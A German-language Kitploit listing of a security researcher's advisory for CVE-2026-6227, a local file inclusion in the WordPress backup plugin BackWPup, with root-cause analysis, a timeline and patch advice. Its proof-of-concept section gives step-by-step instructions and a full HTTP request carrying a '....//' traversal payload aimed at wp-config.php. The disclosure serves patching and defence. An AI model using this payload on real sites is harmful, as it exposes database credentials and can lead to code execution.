Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-6227 — Bildungs-PoC für CVE-2026-6227, eine authentifizierte Local File Inclusion im WordPress-Plugin BackWPup, einschließlich Root-Cause-Analyse, Exploit-Request und Mitigationshinweisen. | Kitploit
Tools/GitHubGitHub/pixel-defaultbr/cve-2026-6227
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPapers & ForschungLernen & Bildung
GitHubpixel-defaultbr/cve-2026-6227

CVE-2026-6227

Bildungs-PoC für CVE-2026-6227, eine authentifizierte Local File Inclusion im WordPress-Plugin BackWPup, einschließlich Root-Cause-Analyse, Exploit-Request und Mitigationshinweisen.

Repository anzeigen
8vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-6227: Lokale Dateieinbindung (Local File Inclusion) in BackWPup

CVSS Version Researcher

Advisory-Zusammenfassung

BackWPup-Versionen bis einschließlich 5.6.6 sind von einer authentifizierten Schwachstelle zur lokalen Dateieinbindung (Local File Inclusion, LFI) über den Parameter block_name des REST-Endpunkts /wp-json/backwpup/v1/getblock betroffen.

Der Fehler wurde durch eine nicht-rekursive str_replace()-Bereinigung von Traversal-Sequenzen verursacht und ist bereits in Version 5.6.7 behoben.

Metadaten

  • CVE: CVE-2026-6227
  • Schweregrad: Hoch
  • CVSS-Score: 7.2
  • Betroffenes Produkt: BackWPup WordPress-Plugin
  • Betroffene Versionen: <= 5.6.6
  • Behobene Version: 5.6.7
  • Status: Gepatcht
  • Offenlegungsdatum: 2026-04-13
  • Forscher: Pixel_DefaultBR

Haftungsausschluss

Dieses Repository dient ausschließlich Bildungs- und ethischen Sicherheitsforschungszwecken. Die hier bereitgestellten Informationen sollen Administratoren und Sicherheitsteams dabei helfen, ihre Systeme zu überprüfen. Verwenden Sie diese nicht gegen Ziele ohne ausdrückliche, schriftliche Genehmigung.

Betroffene Oberfläche

  • Funktion: BackWPupHelpers::component()
  • Endpunkt: POST /wp-json/backwpup/v1/getblock
  • Parameter: block_name
  • Zugriffsebene: Authentifizierter Administrator (oder Benutzer mit delegierten Backup-Berechtigungen)

Ursachenanalyse

Der anfällige Komponenten-Loader wendet vor dem Aufruf von include() eine nicht-rekursive str_replace()-Bereinigung an. Diese kann mit konstruierten Traversal-Mustern wie ....// oder ..././ umgangen werden, wodurch eine angreiferkontrollierte Pfadauflösung ermöglicht wird.

Auswirkungen

  • Einbindung beliebiger lokaler PHP-Dateien vom Server-Dateisystem
  • Mögliche Offenlegung sensibler Daten (z. B. wp-config.php)
  • Mögliche Remote-Codeausführung bei bestimmten Server-/Anwendungskonfigurationen

Standardmäßig erfordert die Ausnutzung Administratorzugriff. Wenn Backup-Berechtigungen delegiert werden, könnten auch Benutzer mit geringeren Rechten diese Schwachstelle ausnutzen.

Voraussetzungen für die Ausnutzung

  • Gültige authentifizierte WordPress-Sitzung
  • Gültiges REST-Nonce
  • Administratorrechte oder delegierte Backup-Berechtigungen

Proof of Concept

Szenario: Lokale Dateieinbindung

  1. Melden Sie sich bei WordPress mit einem Konto an, das über die BackWPup-Job-Fähigkeit verfügt.
  2. Lösen Sie eine normale Anfrage über die Plugin-Oberfläche aus und fangen Sie den Datenverkehr mit einem Proxy ab.
  3. Suchen Sie eine legitime POST-Anfrage an /wp-json/backwpup/v1/getblock.
  4. Ersetzen Sie block_name durch eine Traversal-Payload.

Beispielanfrage:

POST /wp-json/backwpup/v1/getblock HTTP/1.1
Host: target.example.com
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-WP-Nonce: <your_nonce_here>
Cookie: wordpress_logged_in_<hash>=<your_session_cookie>

block_name=....//....//....//....//wp-config&block_type=component&block_data%5Btype%5D=success&block_data%5Bfont%5D=small&block_data%5Bdismiss_icon%5D=true&block_data%5Bcontent%5D=You+scheduled+a+new+backup+successfully!
  1. Beobachten Sie die Antwort, um das Verhalten der Dateieinbindung zu verifizieren.

Zeitplan

  • 2026-03: Schwachstelle an den Hersteller gemeldet
  • 2026-03-25: Hersteller-Patch in 5.6.7 veröffentlicht
  • 2026-04-13: Öffentliche Offenlegung (CVE-2026-6227)

Gegenmaßnahmen

  • Aktualisieren Sie BackWPup auf Version 5.6.7 oder höher
  • Beschränken Sie die Zuweisung der backwpup-Fähigkeit auf vertrauenswürdige Rollen
  • Überprüfen Sie Audit-Logs auf verdächtige Zugriffe auf /wp-json/backwpup/v1/getblock

Referenzen

  • Hersteller-Plugin-Seite: https://wordpress.org/plugins/backwpup/
  • CVE-Referenz (Wordfence): https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/backwpup/backwpup-566-authenticated-administrator-local-file-inclusion-via-block-name-parameter
Tool herunterladen